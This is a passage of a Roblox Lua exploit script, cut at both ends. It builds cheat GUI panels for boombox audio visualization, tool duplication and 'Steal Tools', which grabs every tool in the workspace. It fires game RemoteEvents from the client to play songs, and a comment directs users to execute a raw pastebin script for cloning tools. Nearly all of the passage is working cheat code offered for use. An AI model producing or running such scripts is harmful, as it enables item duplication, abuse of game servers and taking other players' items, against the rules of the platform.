UICorner.CornerRadius = UDim.new(0, 3) UICorner.Parent = MAX MAY.Name = "MAY" MAY.Parent = Frame_6 MAY.BackgroundColor3 = Color3.fromRGB(255, 255, 127) MAY.Position = UDim2.new(0.339622617, 0, 0, 0) MAY.Size = UDim2.new(0, 35, 0, 24) MAY.Font = Enum.Font.Code MAY.Text = "Y" MAY.TextColor3 = Color3.fromRGB(53, 53, 53) MAY.TextSize = 14.000 UICorner_2.CornerRadius = UDim.new(0, 3) UICorner_2.Parent = MAY MAZ.Name = "MAZ" MAZ.Parent = Frame_6 MAZ.BackgroundColor3 = Color3.fromRGB(255, 255, 127) MAZ.Position = UDim2.new(0.660730004, 0, 0, 0) MAZ.Size = UDim2.new(0, 35, 0, 24) MAZ.Font = Enum.Font.Code MAZ.Text = "Z" MAZ.TextColor3 = Color3.fromRGB(53, 53, 53) MAZ.TextSize = 14.000 UICorner_3.CornerRadius = UDim.new(0, 3) UICorner_3.Parent = MAZ Frame_9.Parent = Frame_5 Frame_9.BackgroundColor3 = Color3.fromRGB(25, 25, 25) Frame_9.BorderColor3 = Color3.fromRGB(0, 0, 0) Frame_9.Position = UDim2.new(0.685294092, 0, 0.293434799, 0) Frame_9.Size = UDim2.new(0, 107, 0, 24) Frame_10.Parent = Frame_9 Frame_10.BackgroundColor3 = Color3.fromRGB(80, 80, 80) Frame_10.BackgroundTransparency = 0.700 Frame_10.BorderColor3 = Color3.fromRGB(27, 42, 53) Frame_10.Position = UDim2.new(0.335000008, 0, 0, 0) Frame_10.Size = UDim2.new(0, 1, 0, 24) Frame_11.Parent = Frame_9 Frame_11.BackgroundColor3 = Color3.fromRGB(80, 80, 80) Frame_11.BackgroundTransparency = 0.700 Frame_11.BorderColor3 = Color3.fromRGB(27, 42, 53) Frame_11.Position = UDim2.new(0.660274863, 0, 0, 0) Frame_11.Size = UDim2.new(0, 1, 0, 24) WAX.Name = "WAX" WAX.Parent = Frame_9 WAX.BackgroundColor3 = Color3.fromRGB(255, 255, 127) WAX.Position = UDim2.new(0.0093457941, 0, 0, 0) WAX.Size = UDim2.new(0, 35, 0, 24) WAX.Font = Enum.Font.Code WAX.Text = "X" WAX.TextColor3 = Color3.fromRGB(53, 53, 53) WAX.TextSize = 14.000 UICorner_4.CornerRadius = UDim.new(0, 3) UICorner_4.Parent = WAX WAY.Name = "WAY" WAY.Parent = Frame_9 WAY.BackgroundColor3 = Color3.fromRGB(255, 255, 127) WAY.Position = UDim2.new(0.339622617, 0, 0, 0) WAY.Size = UDim2.new(0, 35, 0, 24) WAY.Font = Enum.Font.Code WAY.Text = "Y" WAY.TextColor3 = Color3.fromRGB(53, 53, 53) WAY.TextSize = 14.000 UICorner_5.CornerRadius = UDim.new(0, 3) UICorner_5.Parent = WAY WAZ.Name = "WAZ" WAZ.Parent = Frame_9 WAZ.BackgroundColor3 = Color3.fromRGB(255, 255, 127) WAZ.Position = UDim2.new(0.660730004, 0, 0, 0) WAZ.Size = UDim2.new(0, 35, 0, 24) WAZ.Font = Enum.Font.Code WAZ.Text = "Z" WAZ.TextColor3 = Color3.fromRGB(53, 53, 53) WAZ.TextSize = 14.000 UICorner_6.CornerRadius = UDim.new(0, 3) UICorner_6.Parent = WAZ WavesOn.Name = "WavesOn" WavesOn.Parent = Frame_9 WavesOn.BackgroundColor3 = Color3.fromRGB(31, 31, 31) WavesOn.Position = UDim2.new(0.814416647, 0, -1.17032111, 0) WavesOn.Size = UDim2.new(0, 18, 0, 18) WavesOn.Font = Enum.Font.Code WavesOn.Text = "" WavesOn.TextColor3 = Color3.fromRGB(53, 53, 53) WavesOn.TextSize = 14.000 UICorner_7.CornerRadius = UDim.new(0, 3) UICorner_7.Parent = WavesOn TextLabel_5.Parent = Frame_5 TextLabel_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_5.BackgroundTransparency = 1.000 TextLabel_5.Position = UDim2.new(0.729761064, 0, 0.0342337564, 0) TextLabel_5.Size = UDim2.new(0, 69, 0, 13) TextLabel_5.Font = Enum.Font.Code TextLabel_5.Text = "Waves" TextLabel_5.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_5.TextSize = 13.000 TextLabel_6.Parent = Frame_5 TextLabel_6.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_6.BackgroundTransparency = 1.000 TextLabel_6.Position = UDim2.new(0.685643435, 0, 0.159233764, 0) TextLabel_6.Size = UDim2.new(0, 48, 0, 13) TextLabel_6.Font = Enum.Font.Code TextLabel_6.Text = "Enabled" TextLabel_6.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_6.TextSize = 13.000 TextLabel_7.Parent = Frame_5 TextLabel_7.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_7.BackgroundTransparency = 1.000 TextLabel_7.Position = UDim2.new(0.401329696, 0, 0.0342337564, 0) TextLabel_7.Size = UDim2.new(0, 69, 0, 13) TextLabel_7.Font = Enum.Font.Code TextLabel_7.Text = "Misc" TextLabel_7.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_7.TextSize = 13.000 Distance.Name = "Distance" Distance.Parent = Frame_5 Distance.BackgroundColor3 = Color3.fromRGB(20, 20, 20) Distance.BorderColor3 = Color3.fromRGB(54, 54, 54) Distance.Position = UDim2.new(0.339382857, 0, 0.36220783, 0) Distance.Size = UDim2.new(0, 119, 0, 29) Distance.Font = Enum.Font.Code Distance.PlaceholderText = "Distance (5)" Distance.Text = "" Distance.TextColor3 = Color3.fromRGB(255, 255, 255) Distance.TextSize = 14.000 WaveInt.Name = "WaveInt" WaveInt.Parent = Frame_5 WaveInt.BackgroundColor3 = Color3.fromRGB(20, 20, 20) WaveInt.BorderColor3 = Color3.fromRGB(54, 54, 54) WaveInt.Position = UDim2.new(0.339000016, 0, 0.581853449, 0) WaveInt.Size = UDim2.new(0, 119, 0, 29) WaveInt.Font = Enum.Font.Code WaveInt.PlaceholderText = "Wave Intensity (3)" WaveInt.Text = "" WaveInt.TextColor3 = Color3.fromRGB(255, 255, 255) WaveInt.TextSize = 12.000 Speed.Name = "Speed" Speed.Parent = Frame_5 Speed.BackgroundColor3 = Color3.fromRGB(20, 20, 20) Speed.BorderColor3 = Color3.fromRGB(54, 54, 54) Speed.Position = UDim2.new(0.340999991, 0, 0.806634486, 0) Speed.Size = UDim2.new(0, 119, 0, 29) Speed.Font = Enum.Font.Code Speed.PlaceholderColor3 = Color3.fromRGB(178, 178, 178) Speed.PlaceholderText = "Speed (1)" Speed.Text = "" Speed.TextColor3 = Color3.fromRGB(255, 255, 255) Speed.TextSize = 14.000 AudioId.Name = "AudioId" AudioId.Parent = Frame AudioId.BackgroundColor3 = Color3.fromRGB(20, 20, 20) AudioId.BorderColor3 = Color3.fromRGB(54, 54, 54) AudioId.Position = UDim2.new(0.0256573875, 0, 0.104059465, 0) AudioId.Size = UDim2.new(0, 119, 0, 26) AudioId.Font = Enum.Font.Code AudioId.PlaceholderText = "Audio-ID" AudioId.Text = "" AudioId.TextColor3 = Color3.fromRGB(255, 255, 255) AudioId.TextSize = 14.000 Amount.Name = "Amount" Amount.Parent = Frame Amount.BackgroundColor3 = Color3.fromRGB(20, 20, 20) Amount.BorderColor3 = Color3.fromRGB(54, 54, 54) Amount.Position = UDim2.new(0.0256573875, 0, 0.202760756, 0) Amount.Size = UDim2.new(0, 119, 0, 26) Amount.Font = Enum.Font.Code Amount.PlaceholderColor3 = Color3.fromRGB(178, 178, 178) Amount.PlaceholderText = "Amount" Amount.Text = "" Amount.TextColor3 = Color3.fromRGB(255, 255, 255) Amount.TextSize = 14.000 TextBox_3.Name = "TextBox" TextBox_3.Parent = Frame TextBox_3.BackgroundColor3 = Color3.fromRGB(20, 20, 20) TextBox_3.BorderColor3 = Color3.fromRGB(54, 54, 54) TextBox_3.Position = UDim2.new(0.345004708, 0, 0.202760756, 0) TextBox_3.Size = UDim2.new(0, 125, 0, 26) TextBox_3.Font = Enum.Font.Code TextBox_3.Text = "Dupe Amount" TextBox_3.TextColor3 = Color3.fromRGB(255, 255, 255) TextBox_3.TextSize = 14.000 TextBox_4.Name = "TextBox" TextBox_4.Parent = Frame TextBox_4.BackgroundColor3 = Color3.fromRGB(20, 20, 20) TextBox_4.BorderColor3 = Color3.fromRGB(54, 54, 54) TextBox_4.Position = UDim2.new(0.678338051, 0, 0.202760756, 0) TextBox_4.Size = UDim2.new(0, 119, 0, 26) TextBox_4.Font = Enum.Font.Code TextBox_4.Text = "Steal Tools" TextBox_4.TextColor3 = Color3.fromRGB(255, 255, 255) TextBox_4.TextSize = 14.000 TextBox_5.Name = "TextBox" TextBox_5.Parent = Frame TextBox_5.BackgroundColor3 = Color3.fromRGB(20, 20, 20) TextBox_5.BorderColor3 = Color3.fromRGB(54, 54, 54) TextBox_5.Position = UDim2.new(0.347335726, 0, 0.475488037, 0) TextBox_5.Size = UDim2.new(0, 119, 0, 26) TextBox_5.Font = Enum.Font.Code TextBox_5.Text = "Sync" TextBox_5.TextColor3 = Color3.fromRGB(255, 255, 255) TextBox_5.TextSize = 14.000 -- Scripts: local function SEXI_fake_script() -- TextBox.LocalScript local script = Instance.new('LocalScript', TextBox) local currentid="" local currentconnection=nil local vis = nil local dt =0 local CurrentSound=nil local CurrentTimePosition=0 game:service'RunService'.Stepped:Connect(function(e,d) dt+=d end) local dont=1 function setupadded() game:GetService("Players").LocalPlayer.Character.ChildAdded:Connect(function(child) if child:IsA("Tool") and dont ==0 then wait() child.Parent=game:GetService("Players").LocalPlayer.Backpack wait(.3) dont=1 if vis ~=nil then vis(currentid,CurrentTimePosition) end end end) end setupadded() vis=function(id,timepos) _G.tov={} if _G.NetFix==nil then _G.NetFix=" " game:service'RunService'.Heartbeat:Connect(function() for i,v in pairs(_G.tov) do v[1].Velocity=Vector3.new(2e2,0,0) v[1].CFrame=v[2].CFrame end end) end local Stopped=false local visstuff={} local function align(i) l=Instance.new("Part") l.Transparency=1 l.Parent=i.Parent l.Size=Vector3.new(0,0,0) l.Name="" l.CanCollide=false l.Anchored=true l.CFrame=i.CFrame table.insert(_G.tov,{i,l}) local att0 = Instance.new("Attachment", i) att0.Position = Vector3.new(0,0,0) local att1 = Instance.new("Attachment", l) att1.Position = Vector3.new(0,0,0) local AP = Instance.new("AlignPosition", i) AP.Attachment0 = att0 AP.Attachment1 = att1 AP.RigidityEnabled = true AP.ReactionForceEnabled = false AP.ApplyAtCenterOfMass = true AP.MaxForce = 9999999 AP.MaxVelocity = math.huge AP.Responsiveness = 200 local AO = Instance.new("AlignOrientation", i) AO.Attachment0 = att0 AO.Attachment1 = att1 AO.ReactionTorqueEnabled = false AO.PrimaryAxisOnly = false AO.MaxTorque = 9999999 AO.MaxAngularVelocity = math.huge AO.Responsiveness = 200 table.insert(visstuff,{AO,AP,att0,att1,l}) return l end local Visualizer={} local First=false local Handles={} local ToolCount=0 for i,v in pairs(game:GetService("Players").LocalPlayer.Backpack:GetChildren()) do if v:IsA("Tool") then ToolCount=ToolCount+1 end end local cf=game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame for i,v in pairs(game:GetService("Players").LocalPlayer.Backpack:GetChildren()) do if v:IsA("Tool") then coroutine.wrap(function() if First==false then First=v end local Handle=v:FindFirstChildOfClass("Part") v.Parent=game:GetService("Players").LocalPlayer.Character if Handle:FindFirstChildOfClass("Sound") then Handle:FindFirstChildOfClass("Sound").Parent=Instance.new("Part") end currentid=id v:FindFirstChildOfClass("RemoteEvent"):FireServer("PlaySong",(id)) repeat wait() until Handle:FindFirstChildOfClass("Sound") and Handle:FindFirstChildOfClass("Sound").IsPlaying for i,v in pairs(game:GetService("Players").LocalPlayer.Character:GetDescendants()) do if v.Name=="RightGrip" then v:Destroy() end end Handle.Name="" if First==v then CurrentSound=Handle:FindFirstChildOfClass("Sound") end Handle:FindFirstChildOfClass("Sound").Playing=false coroutine.wrap(function() repeat wait() until v.Parent~=game:GetService("Players").LocalPlayer.Character Handle.Name="Handle" Stopped=true dont=1 _G.tov={} for i,v in pairs(visstuff) do for i,v in pairs(v) do v:Destroy() end end end)() table.insert(Handles,Handle) table.insert(Visualizer,align(Handle)) end)() end end local Root=game:GetService("Players").LocalPlayer.Character.HumanoidRootPart repeat wait() until #Visualizer==ToolCount and CurrentSound wait(1) for i,v in pairs(Handles) do coroutine.wrap(function() v:FindFirstChildOfClass("Sound").TimePosition=timepos v:FindFirstChildOfClass("Sound").Playing=true end)() end spawn(function() while wait(.6) do if Stopped == true then break end if CurrentSound.IsPlaying == true then CurrentTimePosition=CurrentSound.TimePosition end end end) local RenderStepped = game:GetService('RunService').RenderStepped local Wait = RenderStepped.Wait local Selected=CurrentSound local p = Instance.new("Part") function CF2V(cf) p.CFrame=cf return p.Rotation end local function AngleFromSettings(angle,str) if str=="X" then return CFrame.Angles(angle,0,0) elseif str=="Y" then return CFrame.Angles(0,angle,0) elseif str=="Z" then return CFrame.Angles(0,0,angle) end end local function VectorFromSettings(angle,str) if str=="X" then return Vector3.new(angle,0,0) elseif str=="Y" then return Vector3.new(0,angle,0) elseif str=="Z" then return Vector3.new(0,0,angle) end end dont=0 setupadded() for K,V in next, Visualizer do coroutine.wrap(function() repeat local Spin = 0 repeat if CurrentSound then local Volume = CurrentSound['PlaybackLoudness'] local Iterator=math.rad(Spin+(K*(360/#Visualizer))) local Z = _G.Distance + Volume / (1 ~= 100 and (100 - 1) or .01) local G = Volume / (35 ~= 100 and (100 - 35) or .01) local P = CFrame.new(Root['Position']) * AngleFromSettings(Iterator,_G.VisAngle) * CFrame.new(0,0,Z) local AddVector =Vector3.new(0,0,0) if _G.WavesOn == "On" then AddVector=VectorFromSettings(math.sin((((dt*_G.WaveInt)+(K/#Visualizer)*(math.pi*2)))),_G.WavesAngle) end V['Position'] = P.p+AddVector V['Rotation'] = CF2V(CFrame.new(V.Position, Root['Position'] + Vector3.new(0, G, 0))) end Spin+=_G.Speed game:service'RunService'.RenderStepped:Wait() until Stopped or ((Spin >= 360)) until Stopped ccc:Disconnect() end)() end end script.Parent.MouseButton1Click:Connect(function() vis(script.Parent.Parent.AudioId.Text:gsub("%D+", ""),0) end) end coroutine.wrap(SEXI_fake_script)() local function KAVXTI_fake_script() -- TextBox_2.LocalScript local script = Instance.new('LocalScript', TextBox_2) script.Parent.MouseButton1Click:Connect(function() local Backpack=game:GetService("Players").LocalPlayer.Backpack local lp=game:GetService("Players").LocalPlayer local tosync=false local tt=0 for i,v in pairs(Backpack:GetChildren()) do if v:IsA("Tool") then tt=tt+1 end end local t = {} for i,v in pairs(Backpack:GetChildren()) do if v:IsA("Tool") then coroutine.wrap(function() if v.Handle:FindFirstChildOfClass("Sound") then v.Handle:FindFirstChildOfClass("Sound"):Destroy() end v.Parent=lp.Character v:FindFirstChildOfClass("RemoteEvent"):FireServer("PlaySong",(script.Parent.Parent.AudioId.Text:gsub("%D+", ""))) repeat wait() until v.Handle:FindFirstChildOfClass("Sound") repeat wait() until v.Handle:FindFirstChildOfClass("Sound").IsPlaying v.Handle:FindFirstChildOfClass("Sound").Playing=false table.insert(t,v) end)() end end repeat game:service'RunService'.Heartbeat:Wait() until #t==tt wait(1) for i,v in pairs(t) do coroutine.wrap(function() v.Handle:FindFirstChildOfClass("Sound").TimePosition=0 v.Handle:FindFirstChildOfClass("Sound").Playing=true end)() end print("done") end) end coroutine.wrap(KAVXTI_fake_script)() local function RNDUOWT_fake_script() -- MAX.LocalScript local script = Instance.new('LocalScript', MAX) script.Parent.MouseButton1Click:Connect(function() _G.VisAngle=script.Parent.Name:gsub("MA","") end) while wait() do if script.Parent.Name=="MA"..tostring(_G.VisAngle) then script.Parent.BackgroundTransparency=0 script.Parent.TextColor3=Color3.fromRGB(53, 53, 53) else script.Parent.BackgroundTransparency=1 script.Parent.TextColor3=Color3.fromRGB(255,255,255) end end end coroutine.wrap(RNDUOWT_fake_script)() local function GTEJUQ_fake_script() -- MAY.LocalScript local script = Instance.new('LocalScript', MAY) script.Parent.MouseButton1Click:Connect(function() _G.VisAngle=script.Parent.Name:gsub("MA","") end) while wait() do if script.Parent.Name=="MA"..tostring(_G.VisAngle) then script.Parent.BackgroundTransparency=0 script.Parent.TextColor3=Color3.fromRGB(53, 53, 53) else script.Parent.BackgroundTransparency=1 script.Parent.TextColor3=Color3.fromRGB(255,255,255) end end end coroutine.wrap(GTEJUQ_fake_script)() local function RXWR_fake_script() -- MAZ.LocalScript local script = Instance.new('LocalScript', MAZ) script.Parent.MouseButton1Click:Connect(function() _G.VisAngle=script.Parent.Name:gsub("MA","") end) while wait() do if script.Parent.Name=="MA"..tostring(_G.VisAngle) then script.Parent.BackgroundTransparency=0 script.Parent.TextColor3=Color3.fromRGB(53, 53, 53) else script.Parent.BackgroundTransparency=1 script.Parent.TextColor3=Color3.fromRGB(255,255,255) end end end coroutine.wrap(RXWR_fake_script)() local function GJGOKP_fake_script() -- WAX.LocalScript local script = Instance.new('LocalScript', WAX) script.Parent.MouseButton1Click:Connect(function() _G.WavesAngle=script.Parent.Name:gsub("WA","") end) while wait() do if script.Parent.Name=="WA"..tostring(_G.WavesAngle) then script.Parent.BackgroundTransparency=0 script.Parent.TextColor3=Color3.fromRGB(53, 53, 53) else script.Parent.BackgroundTransparency=1 script.Parent.TextColor3=Color3.fromRGB(255,255,255) end end end coroutine.wrap(GJGOKP_fake_script)() local function SFNO_fake_script() -- WAY.LocalScript local script = Instance.new('LocalScript', WAY) script.Parent.MouseButton1Click:Connect(function() _G.WavesAngle=script.Parent.Name:gsub("WA","") end) while wait() do if script.Parent.Name=="WA"..tostring(_G.WavesAngle) then script.Parent.BackgroundTransparency=0 script.Parent.TextColor3=Color3.fromRGB(53, 53, 53) else script.Parent.BackgroundTransparency=1 script.Parent.TextColor3=Color3.fromRGB(255,255,255) end end end coroutine.wrap(SFNO_fake_script)() local function QCQM_fake_script() -- WAZ.LocalScript local script = Instance.new('LocalScript', WAZ) script.Parent.MouseButton1Click:Connect(function() _G.WavesAngle=script.Parent.Name:gsub("WA","") end) while wait() do if script.Parent.Name=="WA"..tostring(_G.WavesAngle) then script.Parent.BackgroundTransparency=0 script.Parent.TextColor3=Color3.fromRGB(53, 53, 53) else script.Parent.BackgroundTransparency=1 script.Parent.TextColor3=Color3.fromRGB(255,255,255) end end end coroutine.wrap(QCQM_fake_script)() local function IGYP_fake_script() -- WavesOn.LocalScript local script = Instance.new('LocalScript', WavesOn) script.Parent.MouseButton1Click:Connect(function() if "Waves".._G.WavesOn==script.Parent.Name then _G.WavesOn="Off" else _G.WavesOn="On" end end) while wait() do if script.Parent.Name=="Waves"..tostring(_G.WavesOn) then script.Parent.BackgroundColor3=Color3.fromRGB(255, 255, 127) else script.Parent.BackgroundColor3=Color3.fromRGB(31,31,31) end end end coroutine.wrap(IGYP_fake_script)() local function ZWKUQJ_fake_script() -- Distance.LocalScript local script = Instance.new('LocalScript', Distance) _G[script.Parent.Name]=5 script.Parent.Changed:Connect(function(t) if t=="Text" then _G[script.Parent.Name]=tonumber(script.Parent.Text) or 0 end end) end coroutine.wrap(ZWKUQJ_fake_script)() local function IQGTK_fake_script() -- WaveInt.LocalScript local script = Instance.new('LocalScript', WaveInt) _G[script.Parent.Name]=3 script.Parent.Changed:Connect(function(t) if t=="Text" then _G[script.Parent.Name]=tonumber(script.Parent.Text) or 0 end end) end coroutine.wrap(IQGTK_fake_script)() local function OJSF_fake_script() -- Speed.LocalScript local script = Instance.new('LocalScript', Speed) _G[script.Parent.Name]=1 script.Parent.Changed:Connect(function(t) if t=="Text" then _G[script.Parent.Name]=tonumber(script.Parent.Text) or 0 end end) end coroutine.wrap(OJSF_fake_script)() local function PBYP_fake_script() -- Frame.LocalScript local script = Instance.new('LocalScript', Frame) _G.VisAngle="X" _G.WavesOn="Off" _G.WavesAngle="Y" _G.BoomboxDependantSpeed="Off" end coroutine.wrap(PBYP_fake_script)() local function ZLDS_fake_script() -- Frame.Dragify local script = Instance.new('LocalScript', Frame) local UIS = game:GetService("UserInputService") function dragify(Frame) dragToggle = nil local dragSpeed = 0.50 dragInput = nil dragStart = nil local dragPos = nil function updateInput(input) local Delta = input.Position - dragStart local Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + Delta.X, startPos.Y.Scale, startPos.Y.Offset + Delta.Y) game:GetService("TweenService"):Create(Frame, TweenInfo.new(0), {Position = Position}):Play() end Frame.InputBegan:Connect(function(input) if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) and UIS:GetFocusedTextBox() == nil then dragToggle = true dragStart = input.Position startPos = Frame.Position input.Changed:Connect(function() if input.UserInputState == Enum.UserInputState.End then dragToggle = false end end) end end) Frame.InputChanged:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then dragInput = input end end) game:GetService("UserInputService").InputChanged:Connect(function(input) if input == dragInput and dragToggle then updateInput(input) end end) end dragify(script.Parent) end coroutine.wrap(ZLDS_fake_script)() local function UPYZBO_fake_script() -- TextBox_3.LocalScript local script = Instance.new('LocalScript', TextBox_3) script.Parent.MouseButton1Click:Connect(function() for i=1,tonumber(script.Parent.Parent.Amount.Text) or 1 do char=game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character=nil game:GetService("Players").LocalPlayer.Character=char char.Animate:Destroy() char.HumanoidRootPart.CFrame=CFrame.new(0,9999,0) wait(.1) char.HumanoidRootPart.Anchored=true for i,v in pairs(char:GetChildren()) do if v:IsA("Tool") then v.Parent=game:GetService("Players").LocalPlayer.Backpack end end wait(game:GetService("Players").RespawnTime-0.3) local t = {} for i,v in pairs(game:GetService("Players").LocalPlayer.Backpack:GetChildren()) do v.Parent=char v.Parent=workspace t[i]=v end char.Humanoid:Destroy() game:GetService("Players").LocalPlayer.Character=nil game:GetService("Players").LocalPlayer.CharacterAdded:Wait() char=game:GetService("Players").LocalPlayer.Character char:WaitForChild("Humanoid") wait(.1) for i,v in pairs(t) do char.Humanoid:EquipTool(v) end wait(.3) end end) end coroutine.wrap(UPYZBO_fake_script)() local function ZQYXJZW_fake_script() -- TextBox_4.LocalScript local script = Instance.new('LocalScript', TextBox_4) _G.grabtools=false game:service'RunService'.Heartbeat:Connect(function() local h=game:GetService("Players").LocalPlayer.Character:FindFirstChild("Humanoid") if _G.grabtools==true and h then for i,v in pairs(game:GetService("Workspace"):GetChildren()) do coroutine.wrap(function() if v:IsA("Tool") then h:EquipTool(v) end end)() end end end) spawn(function() while wait() do if _G.grabtools==true then script.Parent.TextColor3=Color3.fromRGB(53, 53, 53) script.Parent.BackgroundColor3=Color3.fromRGB(255, 255, 127) else script.Parent.TextColor3=Color3.fromRGB(255,255,255) script.Parent.BackgroundColor3=Color3.fromRGB(20, 20, 20) end end end) script.Parent.MouseButton1Click:Connect(function() _G.grabtools=not _G.grabtools end) end coroutine.wrap(ZQYXJZW_fake_script)() local function XAHH_fake_script() -- TextBox_5.LocalScript local script = Instance.new('LocalScript', TextBox_5) script.Parent.MouseButton1Click:Connect(function() print(pcall(function() for i,v in pairs(game:GetService("Players").LocalPlayer.Character:GetChildren()) do if v:IsA("Tool") and v:FindFirstChildOfClass("Part"):FindFirstChildOfClass("Sound") then coroutine.wrap(function() v:FindFirstChildOfClass("Part"):FindFirstChildOfClass("Sound").Playing=false wait() v:FindFirstChildOfClass("Part"):FindFirstChildOfClass("Sound").TimePosition=0 v:FindFirstChildOfClass("Part"):FindFirstChildOfClass("Sound").Playing=true end)() end end end)) end) end coroutine.wrap(XAHH_fake_script)() end }) Main:AddButton({ Title = "FE Boombox hub", Description = "idfk but too FE Loop drop tools button below this until you have 25 boomboxes for this", Callback = function() -- to dupe the boomboxes execute this script: https://pastebin.com/raw/jVf3zNVf and do ;clonetool *number* -- doesn't work in every game local req = (syn and syn.request) or (http and http.request) or http_request local ScreenGui = Instance.new("ScreenGui") local Frame = Instance.new("Frame") local UICorner = Instance.new("UICorner") local name = Instance.new("TextLabel") local ScrollingFrame = Instance.new("ScrollingFrame") local ak = Instance.new("TextButton") local rpg = Instance.new("TextButton") local sword = Instance.new("TextButton") local pickaxe = Instance.new("TextButton") local railgun = Instance.new("TextButton") local railgunv2 = Instance.new("TextButton") local pc = Instance.new("TextButton") local arm = Instance.new("TextButton") local phone = Instance.new("TextButton") local tophatx1 = Instance.new("TextButton") local tophatx2 = Instance.new("TextButton") local tophatx3 = Instance.new("TextButton") local UICorner_2 = Instance.new("UICorner") local Close = Instance.new("TextButton") local UICorner_3 = Instance.new("UICorner") local ToolHold = Instance.new("TextButton") local UICorner_4 = Instance.new("UICorner") --Properties: ScreenGui.Parent = game:GetService("Players").LocalPlayer:WaitForChild("PlayerGui") Frame.Parent = ScreenGui Frame.BackgroundColor3 = Color3.fromRGB(77, 77, 77) Frame.Position = UDim2.new(0.368455738, 0, 0.313865125, 0) Frame.Size = UDim2.new(0, 625, 0, 312) UICorner.Parent = Frame name.Name = "name" name.Parent = Frame name.BackgroundColor3 = Color3.fromRGB(255, 255, 255) name.BackgroundTransparency = 1.000 name.Size = UDim2.new(0, 625, 0, 50) name.Font = Enum.Font.SourceSansBold name.Text = "Boombox Grippos UI" name.TextColor3 = Color3.fromRGB(0, 0, 0) name.TextScaled = true name.TextSize = 14.000 name.TextWrapped = true ScrollingFrame.Parent = Frame ScrollingFrame.Active = true ScrollingFrame.BackgroundColor3 = Color3.fromRGB(90, 90, 90) ScrollingFrame.BackgroundTransparency = 0.700 ScrollingFrame.Position = UDim2.new(0, 0, 0.210774451, 0) ScrollingFrame.Size = UDim2.new(0, 625, 0, 246) ak.Name = "ak" ak.Parent = ScrollingFrame ak.BackgroundColor3 = Color3.fromRGB(0, 0, 0) ak.Position = UDim2.new(0.0159999989, 0, 0.0141494665, 0) ak.Size = UDim2.new(0, 185, 0, 40) ak.Font = Enum.Font.Nunito ak.Text = "Ak47 (20)" ak.TextColor3 = Color3.fromRGB(255, 255, 255) ak.TextScaled = true ak.TextSize = 14.000 ak.TextWrapped = true ak.MouseButton1Down:Connect(function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(0.7, -0.5, -0.2) * CFrame.Angles(50, math.rad(-180), 3.13) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(0.5, -1.2, -0.2) * CFrame.Angles(0, math.rad(-90), 0) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(-1.5, -1.2, -0.2) * CFrame.Angles(0, math.rad(-90), 0.03) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(-2.5, -1.2, -0.2) * CFrame.Angles(0, math.rad(-90), 0) Tools[4].Parent = plr.Character Tools[5].Grip = CFrame.new(-4.6, -0.4, -0.2) * CFrame.Angles(1.6, math.rad(-98), 1.6) Tools[5].Parent = plr.Character Tools[6].Grip = CFrame.new(-7, -1.2, -0.2) * CFrame.Angles(0, math.rad(-90), 0) Tools[6].Parent = plr.Character Tools[7].Grip = CFrame.new(-9.6, -1.2, -0.2) * CFrame.Angles(0, math.rad(-90), 0) Tools[7].Parent = plr.Character Tools[8].Grip = CFrame.new(-12.2, -1.2, -0.2) * CFrame.Angles(0, math.rad(-90), 0) Tools[8].Parent = plr.Character Tools[9].Grip = CFrame.new(-1.2, -3.1, -0.2) * CFrame.Angles(1.6, math.rad(-15), 1.6) Tools[9].Parent = plr.Character Tools[10].Grip = CFrame.new(-3.3, -2.7, -0.2) * CFrame.Angles(1.6, math.rad(-25), 1.6) Tools[10].Parent = plr.Character Tools[11].Grip = CFrame.new(-0.1, 1.8, -0.1) * CFrame.Angles(1.6, math.rad(65), 1.6) Tools[11].Parent = plr.Character Tools[12].Grip = CFrame.new(1.3, 2.05, -0.1) * CFrame.Angles(1.6, math.rad(90), 1.6) Tools[12].Parent = plr.Character Tools[13].Grip = CFrame.new(3.15, 2.05, -0.1) * CFrame.Angles(1.6, math.rad(90), 1.6) Tools[13].Parent = plr.Character Tools[14].Grip = CFrame.new(5.3, 2.05, -0.1) * CFrame.Angles(1.6, math.rad(90), 1.6) Tools[14].Parent = plr.Character Tools[15].Grip = CFrame.new(6.5, 4.1, -0.1) * CFrame.Angles(1.6, math.rad(110), 1.6) Tools[15].Parent = plr.Character Tools[16].Grip = CFrame.new(-14.3, -1.2, -0.2) * CFrame.Angles(0, math.rad(-90), 0) Tools[16].Parent = plr.Character Tools[17].Grip = CFrame.new(3.1, -1.2, -0.2) * CFrame.Angles(0, math.rad(-90), 0) Tools[17].Parent = plr.Character Tools[18].Grip = CFrame.new(5.2, -1.2, -0.2) * CFrame.Angles(0, math.rad(-90), 0) Tools[18].Parent = plr.Character Tools[19].Grip = CFrame.new(0.25, 6.8, -0.05) * CFrame.Angles(1.6, math.rad(-0), 1.6) Tools[19].Parent = plr.Character Tools[20].Grip = CFrame.new(3.8, -4.4, -0.27) * CFrame.Angles(1.6, math.rad(-137), 1.6) Tools[20].Parent = plr.Character end) rpg.Name = "rpg" rpg.Parent = ScrollingFrame rpg.BackgroundColor3 = Color3.fromRGB(0, 0, 0) rpg.Position = UDim2.new(0.342400014, 0, 0.0141494665, 0) rpg.Size = UDim2.new(0, 185, 0, 40) rpg.Font = Enum.Font.Nunito rpg.Text = "RPG (13)" rpg.TextColor3 = Color3.fromRGB(255, 255, 255) rpg.TextScaled = true rpg.TextSize = 14.000 rpg.TextWrapped = true rpg.MouseButton1Down:Connect(function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(0.7, -0.5, -0.2) * CFrame.Angles(50, math.rad(-180), 3.13) Tools[1].Parent = 